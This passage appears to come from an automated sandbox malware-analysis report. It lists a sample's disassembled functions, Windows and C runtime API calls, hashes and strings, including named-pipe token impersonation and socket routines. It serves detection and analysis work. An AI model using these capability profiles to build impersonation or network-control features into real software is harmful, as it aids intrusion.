                                                                  • malloc.LIBCMT ref: 001B86CE
                                                                  • _snprintf.LIBCMT ref: 001B86E6
                                                                  • free.LIBCMT ref: 001B870E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                  • String ID: /'); %s
                                                                  • API String ID: 761449704-1283008465
                                                                  • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                                                  • Instruction ID: 53664babb93e745c368a5b9844ddd80b759a732194ffa29d953fd55d02d63f9f
                                                                  • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                                                  • Instruction Fuzzy Hash: 193135213006C125DA199FA36C143E9BB66B79AFE4F984112DEE507BA6CF3CC443C300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$OpenProcessToken
                                                                  • String ID:
                                                                  • API String ID: 2009710997-0
                                                                  • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                                  • Instruction ID: be70d9a1b9824e6d91bdd001a0645cfd12320119953c9e94c73a6e9c154cd505
                                                                  • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                                  • Instruction Fuzzy Hash: 0C21C425304B0186EB54AF62E46475A67A3FBC8BA4F14803CAE4E43B15DF3EC44ACB84
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001BF236
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001BF242
                                                                  • __crtIsPackagedApp.LIBCMT ref: 001BF253
                                                                  • _dosmaperr.LIBCMT ref: 001BF29D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 2917016420-0
                                                                  • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                                  • Instruction ID: 3ed8b6cf709debf8d3d5eb5d30d3862baa036c4a4594f282fce4260f8f547789
                                                                  • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                                  • Instruction Fuzzy Hash: 0821CF36300B4096EB14AF76AC153ADB7E1FBA9BA4F184639EE49437A5DF3CC4428700
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CF004
                                                                    • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                                                                    • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                                                                    • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                                                                  • _errno.LIBCMT ref: 001CF01F
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001CF02A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3191669884-0
                                                                  • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                                  • Instruction ID: 0ce4bd91c6ac52b6e23cc360a9f001d43c82dac6a01da28f891c7d467d7c2d83
                                                                  • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                                  • Instruction Fuzzy Hash: 45218B722047848AD7109F52D485F69B7A6F7A9FE0F69823DEF5807B46CB34C856CB00
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068FC04
                                                                    • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                                                                    • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                                                                    • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                                                                  • _errno.LIBCMT ref: 0068FC1F
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0068FC2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3191669884-0
                                                                  • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                                  • Instruction ID: d3b0a8c39b02e232e219af6ac56bdc75e73b4ff08cdd2bd878a79b47920382d2
                                                                  • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                                  • Instruction Fuzzy Hash: 482183723047888AD761AF11D48469EB7A6FB95BE0F684335EF5817B55CB34CA82C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTickioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 3686034022-0
                                                                  • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                                  • Instruction ID: bbe50e0202cb6f6ad8ee280aec3c1a58fbc916d8ae08fde82de85a24ae74b9b2
                                                                  • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                                  • Instruction Fuzzy Hash: 94112932704EC197E7108B69E8543597322E784BB4F504220DB4E86EA0DFBDCC99CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                                                                  • String ID:
                                                                  • API String ID: 4232080776-0
                                                                  • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                                  • Instruction ID: b18c62b105e39fa9bd382888b4b7a9ba732a94301dd04494ffbb538dad6fbaa7
                                                                  • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                                  • Instruction Fuzzy Hash: 7311E331710642C6F750AB25EC647AA3327FBC4B44F848116890E82E60DF3EC568CB62
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2328795619-0
                                                                  • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                                                  • Instruction ID: c862a0ed6b8f5ce2fa69b836523f6c9ead2efe547d3ca5b4723f08b5149bf0ef
                                                                  • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                                                  • Instruction Fuzzy Hash: 07512C32704350C69B198A665900BBAB691B769BF4F19872DFF7943FD5CB38C4A28740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2328795619-0
                                                                  • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                                  • Instruction ID: 482e37c5ac51eca48aac66d78720c05e2b5d2f6479f3cc17f4d53c8a761545bf
                                                                  • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                                  • Instruction Fuzzy Hash: AF51603170475086FB98BE6695005AAB693F755FF8F148F24AE3947FD4CB38D49A8340
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001B1063
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                    • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                                                                  • free.LIBCMT ref: 001B115E
                                                                  • free.LIBCMT ref: 001B116B
                                                                    • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$freemalloc$_callnewh
                                                                  • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                                                                  • API String ID: 2029259483-317027030
                                                                  • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                                  • Instruction ID: c88a008fba11b0880876a59c021beeebc6c3bd86dbfa66db4d61d791c2e2c4ff
                                                                  • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                                  • Instruction Fuzzy Hash: 4651C072708790A6DB10DF66E4503EEB7A2F399B94F404016EE8A47B58EF7CC609CB40
                                                                  APIs
                                                                  • _mtinitlocknum.LIBCMT ref: 0068A375
                                                                    • Part of subcall function 00683E58: _FF_MSGBANNER.LIBCMT ref: 00683E75
                                                                    • Part of subcall function 00683E58: _NMSG_WRITE.LIBCMT ref: 00683E7F
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0068A3F8
                                                                  • EnterCriticalSection.KERNEL32 ref: 0068A414
                                                                  • LeaveCriticalSection.KERNEL32 ref: 0068A424
                                                                  • _calloc_crt.LIBCMT ref: 0068A49A
                                                                  • __lock_fhandle.LIBCMT ref: 0068A502
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 445582508-0
                                                                  • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                                  • Instruction ID: 4914a5b9f05a24cbee6919df2c3318ca5fba6cc4527ed45511ea0f3f6cba0893
                                                                  • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                                  • Instruction Fuzzy Hash: 0E51F33260078082EF20EF54D45436DB7ABFB94B58F19471ADE4E477A0DBB8C956C702
                                                                  APIs
                                                                    • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                                                                    • Part of subcall function 00680620: _errno.LIBCMT ref: 00680577
                                                                    • Part of subcall function 00680620: _invalid_parameter_noinfo.LIBCMT ref: 00680582
                                                                  • fseek.LIBCMT ref: 00671730
                                                                    • Part of subcall function 00680EA4: _errno.LIBCMT ref: 00680ECC
                                                                    • Part of subcall function 00680EA4: _invalid_parameter_noinfo.LIBCMT ref: 00680ED7
                                                                  • _ftelli64.LIBCMT ref: 00671738
                                                                    • Part of subcall function 00680F18: _errno.LIBCMT ref: 00680F36
                                                                    • Part of subcall function 00680F18: _invalid_parameter_noinfo.LIBCMT ref: 00680F41
                                                                  • fseek.LIBCMT ref: 00671748
                                                                    • Part of subcall function 00680EA4: _fseek_nolock.LIBCMT ref: 00680EF5
                                                                  • GetFullPathNameA.KERNEL32 ref: 0067176B
                                                                  • malloc.LIBCMT ref: 00671788
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                    • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                                                                    • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                                                                  • fclose.LIBCMT ref: 00671845
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                                                  • String ID:
                                                                  • API String ID: 3587854850-0
                                                                  • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                                  • Instruction ID: 7ab80978dd0f55085e882ccbcc8fdfab77c345480eb8815360099638d3a819f6
                                                                  • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                                  • Instruction Fuzzy Hash: CB41F52271468082DB84EB26E41576E6353F7C9BD0F90C22AEE5E4BB96DF3DC506CB05
                                                                  APIs
                                                                  • GetACP.KERNEL32 ref: 00675C78
                                                                  • GetOEMCP.KERNEL32 ref: 00675C82
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00675CA8
                                                                  • GetTickCount.KERNEL32 ref: 00675CB0
                                                                    • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                                                                  • GetCurrentProcess.KERNEL32 ref: 00675CEC
                                                                    • Part of subcall function 00670C64: GetModuleHandleA.KERNEL32 ref: 00670C79
                                                                    • Part of subcall function 00670C64: GetProcAddress.KERNEL32 ref: 00670C89
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00675D5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                                                  • String ID:
                                                                  • API String ID: 3426420785-0
                                                                  • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                                  • Instruction ID: a31f047bb2689254cef874948690ad23f5f662dbf2868a21ec4335529d286551
                                                                  • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                                  • Instruction Fuzzy Hash: EB410662710611A5FF40EBB1DC6579D33ABBF89784F40441AEE0D87A69EF3AC10AC758
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 00676F5E
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • htonl.WS2_32 ref: 00676F91
                                                                  • recvfrom.WS2_32 ref: 00676FD5
                                                                  • WSAGetLastError.WS2_32 ref: 00676FE2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                                                  • String ID:
                                                                  • API String ID: 2310505145-0
                                                                  • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                                  • Instruction ID: dacedd6afec655f8603582c3147e2722dd160d8df43d601f604d9943b79852a0
                                                                  • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                                  • Instruction Fuzzy Hash: 5A41C272304B80C2EB10DF25E85476A77A3F799BA8F148225EA8D47B68DF39C491CF41
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                                                  • String ID:
                                                                  • API String ID: 1014270282-0
                                                                  • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                                  • Instruction ID: 76af5c70d6d55f15a5d3e694d8c45974960cfc59736c55926a841bf454df5036
                                                                  • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                                  • Instruction Fuzzy Hash: 9B319E3221878486EB20CF52D40439977A6F789FD8F088229EE4D47B58DF7DC605CB04
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                                  • Instruction ID: d79c40bf3918c9fa484927681f85c025c9643a4f9237e60832a0d1a35a135649
                                                                  • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                                  • Instruction Fuzzy Hash: 90112B3130478691DB155F72AC0179EA691BBA9BC4F48443DFE8997B15EF3CC4528700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                                  • Instruction ID: a40d540d47b088048bfe16391e653f490ec8f920807c678a62003acf545fab94
                                                                  • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                                  • Instruction Fuzzy Hash: BA112B6131478286FBD1BF22A90131EA7A7BF45BC0F448B25AE8997B15EF3CC4518B15
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 2102446242-0
                                                                  • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                                  • Instruction ID: dd29af7a0bbcfb0f8c885d72607cb4f9eedecfcd2488692b8e97fb2a43453b91
                                                                  • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                                  • Instruction Fuzzy Hash: 9C11E632300681A5DB056FA9E8D9FBD7654ABB1760F59412DEA160B392CB78CC41C314
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0066FC85
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • free.LIBCMT ref: 0066FCC0
                                                                  • fwrite.LIBCMT ref: 0066FD01
                                                                  • fclose.LIBCMT ref: 0066FD09
                                                                  • free.LIBCMT ref: 0066FD16
                                                                    • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                                                                    • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                                                                    • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                                                                  • GetLastError.KERNEL32 ref: 0066FD1B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                                                  • String ID:
                                                                  • API String ID: 1616846154-0
                                                                  • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                                  • Instruction ID: 7beae5d72eb1f2fed228a9ffe6e69fda94c884abe9a2695e6ca6c291c5bb6aa4
                                                                  • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                                  • Instruction Fuzzy Hash: A011C851304B4041DA50F762F05126E5353AB85FE4F448639FF6D47B8AEE3DC6058784
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                                                                  • String ID:
                                                                  • API String ID: 3798860377-0
                                                                  • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                                  • Instruction ID: a5eaa13596bb6ba13a5b20f1861f8e719e20c87dd55486891cc02f8470e61110
                                                                  • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                                  • Instruction Fuzzy Hash: F411C13270465183FB109B25F52872A63A6F784BA8F408215DB5E47F98CF7DC4668B41
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001BE40F
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • malloc.LIBCMT ref: 001BE41D
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                                                                  • malloc.LIBCMT ref: 001BE43F
                                                                  • _snprintf.LIBCMT ref: 001BE45A
                                                                    • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                                                                    • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                                                                  • malloc.LIBCMT ref: 001BE475
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                  • String ID: dpoolWait
                                                                  • API String ID: 2026495703-1875951006
                                                                  • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                                  • Instruction ID: 6bb0191720dd6e5e514b52e385db50caed7c4f5a737b4c4f143b590beaf4cb2e
                                                                  • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                                  • Instruction Fuzzy Hash: 0301DEB1700B9081DA04DB52B844799B7D9F7B8FE0F05822AEFA947BC5CF78C0418780
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0067F00F
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • malloc.LIBCMT ref: 0067F01D
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                                                                  • malloc.LIBCMT ref: 0067F03F
                                                                  • _snprintf.LIBCMT ref: 0067F05A
                                                                    • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                                                                    • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                                                                  • malloc.LIBCMT ref: 0067F075
